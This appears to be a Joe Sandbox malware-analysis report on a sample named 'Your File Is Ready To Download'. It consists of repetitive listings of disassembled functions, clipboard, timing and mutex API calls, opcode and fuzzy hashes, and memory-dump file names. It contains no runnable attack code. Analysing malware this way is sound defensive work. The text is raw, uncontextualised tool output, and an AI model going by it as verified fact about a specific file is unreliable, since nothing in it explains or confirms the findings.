Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: a972910a07b62aa6233c6906e4f4053767f0c6ab0a8133b48f442818b4f9800e
Instruction ID: 559d60a5527382382b58865e5d2edc42a2d8c02177a3b85cae19912a811f2b81
Opcode Fuzzy Hash: a972910a07b62aa6233c6906e4f4053767f0c6ab0a8133b48f442818b4f9800e
Instruction Fuzzy Hash: F5914A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5947AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038156, Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A8110: GetFullPathNameW.KERNEL32(?,000000014003817F), ref: 00000001400A815C
Part of subcall function 00000001400A8110: WritePrivateProfileStringW.KERNEL32 ref: 00000001400A818F
Part of subcall function 00000001400A8110: WritePrivateProfileStringW.KERNEL32 ref: 00000001400A821C

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$PrivateProfileStringWrite$ClipboardCloseFullGlobalMessageNamePathPeekUnlock
String ID:
API String ID: 2214806735-0
Opcode ID: ec5568a2cc6fc2d538a7fef80bdd537fa074d23790feed04eec07492d2f7b6b4
Instruction ID: ff80afe14330d23c64034345baa6099e7e823e29519c962c11066e9479e937a7
Opcode Fuzzy Hash: ec5568a2cc6fc2d538a7fef80bdd537fa074d23790feed04eec07492d2f7b6b4
Instruction Fuzzy Hash: 32912931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400365BC, Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 90bee7c6787b58a3d53b315e3d349fc93a48a6b99ac64a542921c2ee4d0e1831
Instruction ID: 0d812ad5943fac33cc80bcccacd539fd20e1f6e11964ca0e046d1199e6957aec
Opcode Fuzzy Hash: 90bee7c6787b58a3d53b315e3d349fc93a48a6b99ac64a542921c2ee4d0e1831
Instruction Fuzzy Hash: A8914931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400367C1, Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: cf251be6afe6b6713f41f6e4e8b26a38b1ca56cb428344335dfb0d38a7b03a57
Instruction ID: 6d6323d427a85f2420e3fdf6b317896ab552785893d19bb27dfc8bef293756da
Opcode Fuzzy Hash: cf251be6afe6b6713f41f6e4e8b26a38b1ca56cb428344335dfb0d38a7b03a57
Instruction Fuzzy Hash: F8913A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216EB5947AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400367EF, Relevance: 9.2, APIs: 6, Instructions: 175windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140051700: GetWindowRect.USER32 ref: 0000000140051786

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekRectUnlockWindow
String ID:
API String ID: 1900757344-0
Opcode ID: a4d770e6010a648fc5530070cede8acc97b6393d781b4e6f95f78b3a0856a0c9
Instruction ID: cf235303c9cacdd03ff0586c050695ff5c3511e7825ade4502edb49383cc8fda
Opcode Fuzzy Hash: a4d770e6010a648fc5530070cede8acc97b6393d781b4e6f95f78b3a0856a0c9
Instruction Fuzzy Hash: BE914A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216EB5947AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038017, Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: fcd719b2242053e322410d2269258bcce9034da843dcdaa2f1bc5b8f0a506f69
Instruction ID: e4cebf3604340715501835ea2dbb0eaf3dca9113579c6cebb53fab22eb961859
Opcode Fuzzy Hash: fcd719b2242053e322410d2269258bcce9034da843dcdaa2f1bc5b8f0a506f69
Instruction Fuzzy Hash: 86814A31604B4086FB6B8B27A8443EA77A2F79DBD4F544216EB59876F5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003706D, Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 371205aeaf19aa416dc033dc9c35e239c4cda74100fcdd1de13693342cdf6996
Instruction ID: ba25751bd67c66cdcc981525960be61b93530ffbce360606cd1c00912f0af11e
Opcode Fuzzy Hash: 371205aeaf19aa416dc033dc9c35e239c4cda74100fcdd1de13693342cdf6996
Instruction Fuzzy Hash: A7813B31604B4086FB6B8B27A8443EA77A2F78DBD4F544116EB59876F5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003594D, Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Part of subcall function 0000000140014BA0: CloseHandle.KERNEL32 ref: 0000000140014C6E
Part of subcall function 0000000140014BA0: CreateMutexW.KERNEL32 ref: 0000000140014C7F
Part of subcall function 0000000140014BA0: GetLastError.KERNEL32 ref: 0000000140014C88
Part of subcall function 0000000140014BA0: GetWindowThreadProcessId.USER32 ref: 0000000140014D44

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
String ID:
API String ID: 4284707085-0
Opcode ID: 70a1a5c750281318e13eed769d00ad76eb9f1bab2f74ea2d25dbdef0590ce66e
Instruction ID: c7586527f098a2a8b7ff876e2397607fa05713f06dc11e3b943ca79693f05f5c
Opcode Fuzzy Hash: 70a1a5c750281318e13eed769d00ad76eb9f1bab2f74ea2d25dbdef0590ce66e
Instruction Fuzzy Hash: 1B815B31600B4086FB6B8B27E8447EA77A2F78DBD4F544115EB5987AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003597D, Relevance: 9.2, APIs: 6, Instructions: 174windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Part of subcall function 0000000140014BA0: CloseHandle.KERNEL32 ref: 0000000140014C6E
Part of subcall function 0000000140014BA0: CreateMutexW.KERNEL32 ref: 0000000140014C7F
Part of subcall function 0000000140014BA0: GetLastError.KERNEL32 ref: 0000000140014C88
Part of subcall function 0000000140014BA0: GetWindowThreadProcessId.USER32 ref: 0000000140014D44

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$Close$ClipboardCreateErrorGlobalHandleLastMessageMutexPeekProcessThreadUnlockWindow
String ID:
API String ID: 4284707085-0
Opcode ID: 44aff692a4f4f5cdd4bab0bbb1ff7b0c55bb7d67c196165569a4d9bae6559c6b
Instruction ID: eeecdc4fbd64b5b419a5610d62b839c45c81a41ccd1ed37310846b5e3f920e9a
Opcode Fuzzy Hash: 44aff692a4f4f5cdd4bab0bbb1ff7b0c55bb7d67c196165569a4d9bae6559c6b
Instruction Fuzzy Hash: E6815B31600B4086FB6B8B27E8547EA77A2F78DBD4F544116EB5A87AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037116, Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: f485652cac5880dad50802fad91016416bab35216c8eb3106a45425b092cd162
Instruction ID: 754290ec88adaba18583e991395bf60a90ad48095f8bc92dc275f82a9da489b9
Opcode Fuzzy Hash: f485652cac5880dad50802fad91016416bab35216c8eb3106a45425b092cd162
Instruction Fuzzy Hash: FB813931604B4086FB6B8B27A8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140038130, Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400A7BE0: GetFullPathNameW.KERNEL32(?,?,?,0000000140038151), ref: 00000001400A7C39
Part of subcall function 00000001400A7BE0: GetPrivateProfileStringW.KERNEL32 ref: 00000001400A7C75

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseFullGlobalMessageNamePathPeekPrivateProfileStringUnlock
String ID:
API String ID: 3404763234-0
Opcode ID: 1388c4d351ce2570b4164d594ae4d6af76ceffa94a9614ce7eeb611f6de3a7e4
Instruction ID: efdc6173ca123e2bd01f38080cae493d5ed657e20b337dd2666299042412dc0e
Opcode Fuzzy Hash: 1388c4d351ce2570b4164d594ae4d6af76ceffa94a9614ce7eeb611f6de3a7e4
Instruction Fuzzy Hash: 18814931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38C885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036658, Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 54208441f3d306d51c8df9389de32a92b07cfe1b348064e363b4b0414f54892b
Instruction ID: 1191e1639a09a14d4b7b03b901b242038490ac5dd7347005523c0baf6754b2ce
Opcode Fuzzy Hash: 54208441f3d306d51c8df9389de32a92b07cfe1b348064e363b4b0414f54892b
Instruction Fuzzy Hash: E9813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003673B, Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004ECD0: GetWindowTextLengthW.USER32 ref: 000000014004ECFE

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalLengthMessagePeekTextUnlockWindow
String ID:
API String ID: 1215013059-0
Opcode ID: 60061d16e72e3cff4a3f5403f3acd92cad3e054d8137ebbc2809363e6eef414e
Instruction ID: 86e57e88c68826c5778b0438ad71ee7963a854e0b9f87203da6fc0fe193e29a8
Opcode Fuzzy Hash: 60061d16e72e3cff4a3f5403f3acd92cad3e054d8137ebbc2809363e6eef414e
Instruction Fuzzy Hash: AB814931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036761, Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: c321ddc10486dd2a807984b8e89f2807dc2c873d3b06f3533af39e9356bb602d
Instruction ID: a4676e33ed2f7808107ffbc7fd6f998e0e9efab569cd39c282aa9bb1afb3e3c0
Opcode Fuzzy Hash: c321ddc10486dd2a807984b8e89f2807dc2c873d3b06f3533af39e9356bb602d
Instruction Fuzzy Hash: F1814931604B4086FB6B8B27E8443EA77A2F78DBD4F544216EB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036EE6, Relevance: 9.2, APIs: 6, Instructions: 173windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014005ED30: wcsncpy.LIBCMT ref: 000000014005ED89
Part of subcall function 000000014005ED30: SetVolumeLabelW.KERNEL32 ref: 000000014005EDD4

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalLabelMessagePeekUnlockVolumewcsncpy
String ID:
API String ID: 2345973108-0
Opcode ID: 9c163dcd07f5e021483e659cd4a2dfc4fce8b28f84f8b8b3ae5aedfdfd0a2c47
Instruction ID: 36665a617fa557ede144eef12045c10bbbf348a633edbc5814a2887cafa03f10
Opcode Fuzzy Hash: 9c163dcd07f5e021483e659cd4a2dfc4fce8b28f84f8b8b3ae5aedfdfd0a2c47
Instruction Fuzzy Hash: 68813A31604B4086FB6B8B27A8443EA77A2F78DBD4F544216FB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140037FEC, Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
CloseClipboard.USER32 ref: 0000000140031FFE
GetTickCount.KERNEL32 ref: 0000000140032011
PeekMessageW.USER32 ref: 0000000140032045
GetTickCount.KERNEL32 ref: 0000000140032059
GetTickCount.KERNEL32 ref: 0000000140032127

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
String ID:
API String ID: 1623861271-0
Opcode ID: 5fd863d7807375d79584b23e0e10bd945f8d010755a39822b983e8d0e8c7df6b
Instruction ID: 7ad15db206e1179db98e69b8dc281a1f557dd685810abb8f112aa467b8357aee
Opcode Fuzzy Hash: 5fd863d7807375d79584b23e0e10bd945f8d010755a39822b983e8d0e8c7df6b
Instruction Fuzzy Hash: 7B814B31604B4086FB6B8B27E8443EA77A2F78DBD4F544116EB5987AF5DB38D885C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400370A1, Relevance: 9.2, APIs: 6, Instructions: 172windowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140065180: _wcstoi64.LIBCMT ref: 00000001400651E8

GlobalUnlock.KERNEL32 ref: 0000000140031FF1
